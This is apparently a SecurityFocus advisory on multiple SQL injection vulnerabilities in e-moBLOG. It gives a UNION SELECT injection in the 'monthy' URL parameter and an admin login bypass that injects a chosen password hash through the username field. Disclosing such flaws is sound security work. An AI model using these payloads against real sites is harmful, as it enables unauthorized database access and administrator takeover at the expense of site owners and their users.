e-moBLOG Multiple SQL Injection Vulnerabilities



An exploit is not required.

Example URI are available:


http://www.example.com/emoblog/index.php? monthy=2006017'% 20union%20select% 201,2,3,4,5, 6,7,8,9,10/*#1

http://www.example.com/emoblog/admin/index.php
username: aaa' union select 'bbb', '[md5-hash of anypass]'/*
password: [anypass]


 

Privacy Statement
Copyright 2010, SecurityFocus